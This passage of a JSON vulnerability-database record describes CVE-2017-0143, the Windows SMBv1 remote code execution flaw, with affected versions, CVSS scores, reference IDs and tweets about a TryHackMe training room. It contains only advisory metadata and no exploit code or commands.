{"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_7", "name": "microsoft windows 7", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1511"}, {"cpeName": "microsoft:windows_vista", "name": "microsoft windows vista", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "-"}], "affectedSoftware": [{"cpeName": "microsoft:server_message_block", "name": "microsoft server message block", "operator": "eq", "version": "1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "cpe23": ["cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}, {"cpe_match": [{"cpe23Uri": "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:-:gold:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": 
"cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:*:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_vista:-:sp2:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "vulnerable": false}], "operator": "OR"}], "operator": "AND"}]}, "cvelist": ["CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "cwe": ["CWE-20"], "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from 
those described in CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.", "edition": 5, "enchantments": {"dependencies": {"modified": "2020-10-03T13:07:29", "references": [{"idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"], "type": "trendmicroblog"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"], "type": "ics"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"], "type": "threatpost"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", 
"MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"], "type": "qualysblog"}, {"idList": ["MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["SMNTC-96703"], "type": "symantec"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "exploitation": {"modified": "2020-10-03T13:07:29", "wildExploited": true, "wildExploitedSources": [{"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}]}, "score": {"modified": "2020-10-03T13:07:29", "rev": 2, "value": 9.2, "vector": "NONE"}, "twitter": {"counter": 27, "modified": "2020-10-03T13:07:29", "tweets": [{"link": "https://twitter.com/haisenb3rg/status/1355219896876101633", "text": "Blue - I have just completed this room! 
Check it out: https://t.co/wl8T2v20v5?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/0xMando/status/1354504708145213440", "text": "Blue - I have just completed this room! Check it out: https://t.co/CM3xc69bUu?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe I did it mom! /darkstar7471"}, {"link": "https://twitter.com/strudinox/status/1352367654514814976", "text": "Blue - I have just completed this room! Check it out: https://t.co/kUcxTcX0cK?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/DaemonExala/status/1355469648314163201", "text": "Blue - I have just completed this room! 
Check it out: https://t.co/pRJxaPlaBu?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue /hashtag/MS17?src=hashtag_click-010 /hashtag/CVE2017?src=hashtag_click-0144 /hashtag/CVE?src=hashtag_click-2017-0145 /hashtag/CVE?src=hashtag_click-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/mell0wx/status/1350568935335358464", "text": "Blue - I have just completed this room! Check it out: https://t.co/C1ARvEqI3z?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/Wrth1_/status/1350977622700937217", "text": "Blue - I have just completed this room! 
Check it out: https://t.co/Obry4AfJD1?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/VulmonFeeds/status/1354747318004805632", "text": "CVE-2017-0143\n\nThe SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Ser...\n\nhttps://t.co/qJj60LUVMn?amp=1\n\nIntelligence based vulnerability management: https://t.co/zWLn5A4tTA?amp=1"}, {"link": "https://twitter.com/reason2008/status/1352019208620683266", "text": "Blue - I have just completed this room! Check it out: https://t.co/eudEV3HK2W?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/m3t4ll0rdz/status/1353147857017176069", "text": "Blue - I have just completed this room! 
Check it out: https://t.co/6r4PlwLHqj?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/CreatureofHabi7/status/1351637620674211841", "text": "Blue - I have just completed this room! Check it out: https://t.co/RchZjhOQvw?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}]}}, "extraReferences": [], "hash": "350cadcb180e0f590eb554c36f0ac10d6d71a2c746cb1937dbbf31b156514eef", "hashmap": [{"hash": "732a831a7eed3955e8de18b2d8903bc8", "key": "cvss3"}, {"hash": "73402198f736fb284b47cab17ac32650", "key": "description"}, {"hash": "d931342d7091edb0db4db482c531ce39", "key": "cpeConfiguration"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "published"}, {"hash": "e758f8fa39ce9e8de2ffe527ec8b6423", "key": "affectedSoftware"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "a173072793578541ea04b7baa0323592", "key": "cpe"}, {"hash": "1b0a551fb9c586414474d37717dc313a", "key": "href"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "dd4a1fba31e29c6988f563bdeb65c80c", "key": "affectedConfiguration"}, {"hash": "0751f4e56f29adf827144e01a128331d", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "f11fa97bbd952a3146ffbddd59276c1d", "key": "title"}, 
{"hash": "2f4290596ecc563b65873431415d8e8a", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "extraReferences"}, {"hash": "e8dbb4c019811b96da3443b871bd4b26", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "67164609e54a9c48368f8c8211098c3c", "key": "cvelist"}, {"hash": "d68798550042e5272198c20ea65d8f01", "key": "modified"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0143", "id": "CVE-2017-0143", "lastseen": "2020-10-03T13:07:29", "modified": "2018-06-21T01:29:00", "objectVersion": "1.3", "published": "2017-03-17T00:59:00", "references": ["http://www.securityfocus.com/bid/96703", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0143", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://www.securitytracker.com/id/1037991", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "https://www.exploit-db.com/exploits/43970/", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "reporter": "cve@mitre.org", "title": "CVE-2017-0143", "type": "cve", "viewCount": 154}, "differentElements": ["extraReferences"], "edition": 5, "lastseen": "2020-10-03T13:07:29"}, {"bulletin": {"affectedSoftware": [{"name": "microsoft server_message_block", "operator": "eq", "version": "1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "cpe23": [], "cvelist": ["CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": 
"NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "cwe": ["CWE-20"], "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.", "edition": 1, "enchantments": {"dependencies": {"modified": "2019-05-29T18:16:45", "references": [{"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"], "type": "trendmicroblog"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"], "type": "metasploit"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", 
"THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"], "type": "threatpost"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["SMNTC-96703"], "type": "symantec"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548"], "type": "packetstorm"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}]}, "score": 
{"modified": "2019-05-29T18:16:45", "value": 9.2, "vector": "NONE"}}, "hash": "e4af194c658335f20de37ce25365f1134c75d50d29f9120d94284d96ba82dba4", "hashmap": [{"hash": "732a831a7eed3955e8de18b2d8903bc8", "key": "cvss3"}, {"hash": "73402198f736fb284b47cab17ac32650", "key": "description"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "published"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "a173072793578541ea04b7baa0323592", "key": "cpe"}, {"hash": "23f9a0531c4b1edff05174a9af52b9a4", "key": "references"}, {"hash": "1b0a551fb9c586414474d37717dc313a", "key": "href"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "bcbed719525ad6e957360150b20c3c47", "key": "affectedSoftware"}, {"hash": "f11fa97bbd952a3146ffbddd59276c1d", "key": "title"}, {"hash": "e8dbb4c019811b96da3443b871bd4b26", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "67164609e54a9c48368f8c8211098c3c", "key": "cvelist"}, {"hash": "d68798550042e5272198c20ea65d8f01", "key": "modified"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0143", "id": "CVE-2017-0143", "lastseen": "2019-05-29T18:16:45", "modified": "2018-06-21T01:29:00", "objectVersion": "1.3", "published": "2017-03-17T00:59:00", "references": ["http://www.securityfocus.com/bid/96703", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0143", "http://www.securitytracker.com/id/1037991", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "https://www.exploit-db.com/exploits/43970/", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", 
"https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "reporter": "cve@mitre.org", "title": "CVE-2017-0143", "type": "cve", "viewCount": 7}, "differentElements": ["references"], "edition": 1, "lastseen": "2019-05-29T18:16:45"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "microsoft:server_message_block", "name": "microsoft server message block", "operator": "eq", "version": "1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "cpe23": ["cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*"], "cpeConfiguration": {}, "cvelist": ["CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "cwe": ["CWE-20"], "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This 
vulnerability is different from those described in CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.", "edition": 4, "enchantments": {"dependencies": {"modified": "2020-09-21T14:31:16", "references": [{"idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"], "type": "ics"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"], "type": "threatpost"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", 
